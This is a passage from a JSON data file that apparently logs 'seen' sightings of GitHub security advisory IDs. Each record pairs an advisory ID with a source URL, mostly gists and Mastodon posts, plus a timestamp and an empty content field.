"creation_timestamp": "2025-07-16T05:11:32.000000Z"}, {"uuid": "a30d5827-c6a6-481b-af07-e977afe50e19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gq7v-jr8c-mfr7", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114711002722266135", "content": "", "creation_timestamp": "2025-06-19T16:36:34.431977Z"}, {"uuid": "a394087d-cf31-409e-a5bf-6d6f862beff6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-028", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114812583163388317", "content": "", "creation_timestamp": "2025-07-07T15:09:50.524762Z"}, {"uuid": "3efd1e4a-e6ae-4b9a-8c57-aede626ff63d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rmjp-cr27-wpg2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114711005781429046", "content": "", "creation_timestamp": "2025-06-19T16:37:20.995496Z"}, {"uuid": "046dcdad-de2c-4f86-adb4-6186eadb84c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/343ed9938db063cadc3b78776bf2f6c2", "content": "", "creation_timestamp": "2025-07-16T09:37:32.000000Z"}, {"uuid": "855153ca-9000-4fd6-8519-490fd0d6ee51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pq2g-wx69-c263", "type": "seen", "source": "https://gist.github.com/safer-bot/343ed9938db063cadc3b78776bf2f6c2", "content": "", "creation_timestamp": "2025-07-16T09:37:32.000000Z"}, {"uuid": "0a2b0cb7-cca7-41e7-a244-acbceecf6892", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8m5-722r-8whq", "type": "seen", "source": "https://gist.github.com/safer-bot/343ed9938db063cadc3b78776bf2f6c2", "content": "", "creation_timestamp": "2025-07-16T09:37:32.000000Z"}, {"uuid": "4642354c-5b32-4bee-8f27-86d06e50bc79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/343ed9938db063cadc3b78776bf2f6c2", "content": "", "creation_timestamp": "2025-07-16T09:37:32.000000Z"}, {"uuid": "de28d96f-e3d5-4522-b67a-61f5429fe250", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73m2-qfq3-56cx", "type": "seen", "source": "https://gist.github.com/safer-bot/343ed9938db063cadc3b78776bf2f6c2", "content": "", "creation_timestamp": "2025-07-16T09:37:32.000000Z"}, {"uuid": "cf43ed1b-e117-47d2-940c-7672dd52d62c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-889j-63jv-qhr8", "type": "seen", "source": "https://gist.github.com/safer-bot/343ed9938db063cadc3b78776bf2f6c2", "content": "", "creation_timestamp": "2025-07-16T09:37:32.000000Z"}, {"uuid": "13ff0307-22a5-46af-943f-7feecc1c1504", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/50f5ce5c46262e64cc86a3000ffff26a", "content": "", "creation_timestamp": "2025-07-16T11:22:46.000000Z"}, {"uuid": "b666985d-9c0e-4677-af62-70726eb39e89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq3w-v528-46rv", "type": "seen", "source": "https://gist.github.com/safer-bot/f61224522155355958d6a621efd7cfe8", "content": "", "creation_timestamp": "2025-07-16T12:59:51.000000Z"}, {"uuid": "aeb8e9db-df4f-4c8c-923c-24ba31d7e306", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/f61224522155355958d6a621efd7cfe8", "content": "", "creation_timestamp": "2025-07-16T12:59:51.000000Z"}, {"uuid": "0005082b-1347-49fb-88e5-b3a064b6a95d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/6ba0327ef93836e33ada465b008ee65d", "content": "", "creation_timestamp": "2025-07-16T13:45:46.000000Z"}, {"uuid": "82b0da8a-2150-49de-a8b8-f7e2b8206d15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/6ba0327ef93836e33ada465b008ee65d", "content": "", "creation_timestamp": "2025-07-16T13:45:46.000000Z"}, {"uuid": "c81e92ed-125c-4745-aae4-92fa3bbabef4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9g37-pgj9-wrhc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114693212327975159", "content": "", "creation_timestamp": "2025-06-16T13:12:14.339998Z"}, {"uuid": "c5eb7b7e-159a-4cb4-be18-619930d34f02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/a137d4a3d86bd50557744e5add779019", "content": "", "creation_timestamp": "2025-07-16T05:23:19.000000Z"}, {"uuid": "088c8e4d-445f-4566-84b5-159348aaef74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2rwm-xv5j-777p", "type": "seen", "source": "https://gist.github.com/safer-bot/2b9e17cccb3cb96d421ee72a90754759", "content": "", "creation_timestamp": "2025-07-16T05:23:52.000000Z"}, {"uuid": "d5b1e1c2-fa05-414d-b8a4-0f0bb4e72e97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/021b0c392999bb69cea1dc0a68d9a243", "content": "", "creation_timestamp": "2025-07-16T09:38:04.000000Z"}, {"uuid": "b9bbf35c-929f-498a-8ad0-f98800389687", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mjmj-j48q-9wg2", "type": "seen", "source": "https://gist.github.com/safer-bot/aca4e378e46713da0969c1bf326de5be", "content": "", "creation_timestamp": "2025-07-16T11:28:45.000000Z"}, {"uuid": "e25e9d7a-cf42-4c73-bed9-126ccf5990e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93m4-mfpg-c3xf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114596728193306173", "content": "", "creation_timestamp": "2025-05-30T12:15:03.716678Z"}, {"uuid": "f7b20d8d-75ed-4719-8117-e03099934b56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/811699bcd24fb9c9b20f9d70743bfff9", "content": "", "creation_timestamp": "2025-07-16T05:25:32.000000Z"}, {"uuid": "55824b69-def1-44f7-9640-7862b00efa99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcwr-x25h-x5fh", "type": "seen", "source": "https://gist.github.com/safer-bot/811699bcd24fb9c9b20f9d70743bfff9", "content": "", "creation_timestamp": "2025-07-16T05:25:32.000000Z"}, {"uuid": "7bb274b4-e845-4adb-acc3-f64d4bf260cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/811699bcd24fb9c9b20f9d70743bfff9", "content": "", "creation_timestamp": "2025-07-16T05:25:32.000000Z"}, {"uuid": "97591331-d9d4-4628-b9a2-d68608da3e4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mjmj-j48q-9wg2", "type": "seen", "source": "https://gist.github.com/safer-bot/7df70d9043df79002466ec734c1504f4", "content": "", "creation_timestamp": "2025-07-16T14:57:42.000000Z"}, {"uuid": "e76c0426-e463-4d2a-87b6-e0683be4e5a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/7d3c3ee6e722698eddb3fcc49696a324", "content": "", "creation_timestamp": "2025-07-16T15:03:54.000000Z"}, {"uuid": "7eda60e1-16de-4cde-a0c1-d5bed9454b34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/7d3c3ee6e722698eddb3fcc49696a324", "content": "", "creation_timestamp": "2025-07-16T15:03:54.000000Z"}, {"uuid": "2eec5534-14de-48f5-a3f9-a7ab9401398e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/7d3c3ee6e722698eddb3fcc49696a324", "content": "", "creation_timestamp": "2025-07-16T15:03:54.000000Z"}, {"uuid": "646a00fc-b015-45c7-b368-f42bf308929d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/a9235081f6b2441209a37e2ee5e1e440", "content": "", "creation_timestamp": "2025-07-16T15:06:10.000000Z"}, {"uuid": "5534eb75-0432-41a6-9259-12609b9ecb01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xfrj-6vvc-3xm2", "type": "seen", "source": "https://gist.github.com/safer-bot/feebdbf91b1e9a0c4915d5d8be07b842", "content": "", "creation_timestamp": "2025-07-16T15:13:48.000000Z"}, {"uuid": "758dfa48-9db6-4eab-8499-5235ed18e3ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h65f-jvqw-m9fj", "type": "seen", "source": "https://gist.github.com/safer-bot/feebdbf91b1e9a0c4915d5d8be07b842", "content": "", "creation_timestamp": "2025-07-16T15:13:48.000000Z"}, {"uuid": "9f1e23e3-78f4-4fce-b4b1-9125af5e18a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3f7h-mf4q-vrm4", "type": "seen", "source": "https://gist.github.com/safer-bot/feebdbf91b1e9a0c4915d5d8be07b842", "content": "", "creation_timestamp": "2025-07-16T15:13:48.000000Z"}, {"uuid": "bc58cfd1-949d-4123-b8d2-b9437717ba30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w4jq-qh47-hvjq", "type": "seen", "source": "https://gist.github.com/safer-bot/feebdbf91b1e9a0c4915d5d8be07b842", "content": "", "creation_timestamp": "2025-07-16T15:13:48.000000Z"}, {"uuid": "5dc6b7da-cdf9-42d3-9e61-592b5e7c01d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j8wc-gxx9-82hx", "type": "seen", "source": "https://gist.github.com/safer-bot/feebdbf91b1e9a0c4915d5d8be07b842", "content": "", "creation_timestamp": "2025-07-16T15:13:48.000000Z"}, {"uuid": "fadb5cbe-9832-45bb-9072-8d2fa1832435", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4q98-wr72-h35w", "type": "seen", "source": "https://gist.github.com/safer-bot/feebdbf91b1e9a0c4915d5d8be07b842", "content": "", "creation_timestamp": "2025-07-16T15:13:48.000000Z"}, {"uuid": "2921cbd8-e0a2-49c9-9cf6-879222264467", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fxph-q3j8-mv87", "type": "seen", "source": "https://gist.github.com/safer-bot/53e9ca5011a13714ab26646575591231", "content": "", "creation_timestamp": "2025-07-16T15:23:31.000000Z"}, {"uuid": "21161101-9c14-49a0-a528-09f345654ea0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p6xc-xr62-6r2g", "type": "seen", "source": "https://gist.github.com/safer-bot/53e9ca5011a13714ab26646575591231", "content": "", "creation_timestamp": "2025-07-16T15:23:31.000000Z"}, {"uuid": "492e292b-7a39-4598-affb-ebb505c71ade", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jfh8-c2jp-5v3q", "type": "seen", "source": "https://gist.github.com/safer-bot/53e9ca5011a13714ab26646575591231", "content": "", "creation_timestamp": "2025-07-16T15:23:31.000000Z"}, {"uuid": "1ec21511-51c0-43b3-b25f-f0ec193621ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7rjr-3q55-vv33", "type": "seen", "source": "https://gist.github.com/safer-bot/53e9ca5011a13714ab26646575591231", "content": "", "creation_timestamp": "2025-07-16T15:23:31.000000Z"}, {"uuid": "7d97e9c6-e2dd-401c-bd27-22674fa6eb50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8489-44mv-ggj8", "type": "seen", "source": "https://gist.github.com/safer-bot/53e9ca5011a13714ab26646575591231", "content": "", "creation_timestamp": "2025-07-16T15:23:31.000000Z"}, {"uuid": "e1452999-9deb-4547-9894-e9dfad387dd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vwqq-5vrc-xw9h", "type": "seen", "source": "https://gist.github.com/safer-bot/53e9ca5011a13714ab26646575591231", "content": "", "creation_timestamp": "2025-07-16T15:23:31.000000Z"}, {"uuid": "ffddd595-9eff-496f-a729-b816bd3df8e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/53e9ca5011a13714ab26646575591231", "content": "", "creation_timestamp": "2025-07-16T15:23:31.000000Z"}, {"uuid": "41afa408-e1a6-4882-b4aa-b2849e798c8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq3w-v528-46rv", "type": "seen", "source": "https://gist.github.com/safer-bot/03f7f0d5931f6af20b42248cd731633a", "content": "", "creation_timestamp": "2025-07-16T15:24:05.000000Z"}, {"uuid": "e36d6141-f619-4cc2-8fd6-70988c558314", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/03f7f0d5931f6af20b42248cd731633a", "content": "", "creation_timestamp": "2025-07-16T15:24:05.000000Z"}, {"uuid": "fae025ba-de21-42fa-97fd-178c33e2779f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://gist.github.com/safer-bot/03f7f0d5931f6af20b42248cd731633a", "content": "", "creation_timestamp": "2025-07-16T15:24:05.000000Z"}, {"uuid": "9a1cdb23-3d87-4ed9-9048-c3872de698d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w37g-rhq8-7m4j", "type": "seen", "source": "https://gist.github.com/safer-bot/03f7f0d5931f6af20b42248cd731633a", "content": "", "creation_timestamp": "2025-07-16T15:24:05.000000Z"}, {"uuid": "3d569219-3a8d-4697-b1f1-e445ce028ca6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xpw8-rcwv-8f8p", "type": "seen", "source": "https://gist.github.com/safer-bot/03f7f0d5931f6af20b42248cd731633a", "content": "", "creation_timestamp": "2025-07-16T15:24:05.000000Z"}, {"uuid": "9d7ef4cb-631a-437c-81c3-e83cb8f58596", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9w3m-gqgf-c4p9", "type": "seen", "source": "https://gist.github.com/safer-bot/03f7f0d5931f6af20b42248cd731633a", "content": "", "creation_timestamp": "2025-07-16T15:24:05.000000Z"}, {"uuid": "07971148-19cd-4526-b90d-6473c4c1ef54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73m2-qfq3-56cx", "type": "seen", "source": "https://gist.github.com/safer-bot/03f7f0d5931f6af20b42248cd731633a", "content": "", "creation_timestamp": "2025-07-16T15:24:05.000000Z"}, {"uuid": "701398a9-5f55-416e-bc10-60a9a97873f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5jpm-x58v-624v", "type": "seen", "source": "https://gist.github.com/safer-bot/03f7f0d5931f6af20b42248cd731633a", "content": "", "creation_timestamp": "2025-07-16T15:24:05.000000Z"}, {"uuid": "20feb225-0044-475e-b7b8-1cb20ec1a231", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mjmj-j48q-9wg2", "type": "seen", "source": "https://gist.github.com/safer-bot/03f7f0d5931f6af20b42248cd731633a", "content": "", "creation_timestamp": "2025-07-16T15:24:05.000000Z"}, {"uuid": "a512b2ab-bc03-431f-9984-f8cc72dc230b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq3w-v528-46rv", "type": "seen", "source": "https://gist.github.com/safer-bot/c3d37218b11c97a4e6892cc8227f2a75", "content": "", "creation_timestamp": "2025-07-16T15:25:48.000000Z"}, {"uuid": "7a1896ca-25b1-4d48-b861-617a30d65663", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/c3d37218b11c97a4e6892cc8227f2a75", "content": "", "creation_timestamp": "2025-07-16T15:25:48.000000Z"}, {"uuid": "7118c270-41df-4bdb-b53b-02c798853207", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xpw8-rcwv-8f8p", "type": "seen", "source": "https://gist.github.com/safer-bot/c3d37218b11c97a4e6892cc8227f2a75", "content": "", "creation_timestamp": "2025-07-16T15:25:48.000000Z"}, {"uuid": "30fa0a27-d457-4ca4-8747-42cf3989a8aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-264p-99wq-f4j6", "type": "seen", "source": "https://gist.github.com/safer-bot/c3d37218b11c97a4e6892cc8227f2a75", "content": "", "creation_timestamp": "2025-07-16T15:25:48.000000Z"}, {"uuid": "465b3373-a872-40d1-8b38-64ceff7dbdeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5jpm-x58v-624v", "type": "seen", "source": "https://gist.github.com/safer-bot/c3d37218b11c97a4e6892cc8227f2a75", "content": "", "creation_timestamp": "2025-07-16T15:25:48.000000Z"}, {"uuid": "a43029e5-2172-4e18-b1b3-bd3399ca574d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6mjq-h674-j845", "type": "seen", "source": "https://gist.github.com/safer-bot/c3d37218b11c97a4e6892cc8227f2a75", "content": "", "creation_timestamp": "2025-07-16T15:25:48.000000Z"}, {"uuid": "9de3064b-cd1a-4c6e-bd60-680cf70a344f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://gist.github.com/safer-bot/c3d37218b11c97a4e6892cc8227f2a75", "content": "", "creation_timestamp": "2025-07-16T15:25:48.000000Z"}, {"uuid": "330280f5-c599-43a8-a8ca-efad6a6e9075", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/edab7faf1498b3bb98fe280405149ea0", "content": "", "creation_timestamp": "2025-07-16T15:28:54.000000Z"}, {"uuid": "733bb9a6-4f7c-4c65-a13f-b488c120e70e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/edab7faf1498b3bb98fe280405149ea0", "content": "", "creation_timestamp": "2025-07-16T15:28:54.000000Z"}, {"uuid": "a70def79-1102-44f4-a8b2-0578d5bbdfc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/edab7faf1498b3bb98fe280405149ea0", "content": "", "creation_timestamp": "2025-07-16T15:28:54.000000Z"}, {"uuid": "32a912c0-8e12-44b1-91ee-e1040061be10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q5r4-cfpx-h6fh", "type": "seen", "source": "https://gist.github.com/safer-bot/12c0956c292010850b5844c050c892e5", "content": "", "creation_timestamp": "2025-07-16T15:28:21.000000Z"}, {"uuid": "83820afd-326a-428c-a65a-129919b40ba0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5v34-g2px-j4fw", "type": "seen", "source": "https://gist.github.com/safer-bot/12c0956c292010850b5844c050c892e5", "content": "", "creation_timestamp": "2025-07-16T15:28:21.000000Z"}, {"uuid": "d916319a-4221-475a-a153-7fd2bb783f9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4p6w-m9wc-c9c9", "type": "seen", "source": "https://gist.github.com/safer-bot/12c0956c292010850b5844c050c892e5", "content": "", "creation_timestamp": "2025-07-16T15:28:21.000000Z"}, {"uuid": "ca1e1f6b-54ae-4cb0-869e-ca99df6e2e8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/12c0956c292010850b5844c050c892e5", "content": "", "creation_timestamp": "2025-07-16T15:28:21.000000Z"}, {"uuid": "3262c9be-885f-486e-957d-12c857f1b5ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/fa011c927b4d25c18141fbfd5cd31096", "content": "", "creation_timestamp": "2025-07-16T15:34:31.000000Z"}, {"uuid": "67331a96-7626-4bb5-9f0f-3b84571adccf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/fa011c927b4d25c18141fbfd5cd31096", "content": "", "creation_timestamp": "2025-07-16T15:34:31.000000Z"}, {"uuid": "0e5a6660-7e22-4c9d-92f7-82bfff6e130b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/fa011c927b4d25c18141fbfd5cd31096", "content": "", "creation_timestamp": "2025-07-16T15:34:31.000000Z"}, {"uuid": "43d3c4fa-b7bc-4a3b-802a-1448e075d3f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/fa011c927b4d25c18141fbfd5cd31096", "content": "", "creation_timestamp": "2025-07-16T15:34:31.000000Z"}, {"uuid": "67c580ca-fff2-426e-b430-5bd35e2a3e66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/9e275914081f1451fb7c285908b92354", "content": "", "creation_timestamp": "2025-07-16T15:36:15.000000Z"}, {"uuid": "5d921579-dac0-4e7f-9c17-bba83af78e40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/9e275914081f1451fb7c285908b92354", "content": "", "creation_timestamp": "2025-07-16T15:36:15.000000Z"}, {"uuid": "62590a33-6367-4018-beb8-8b6f9680eed4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xh5x-j8jf-pcpx", "type": "seen", "source": 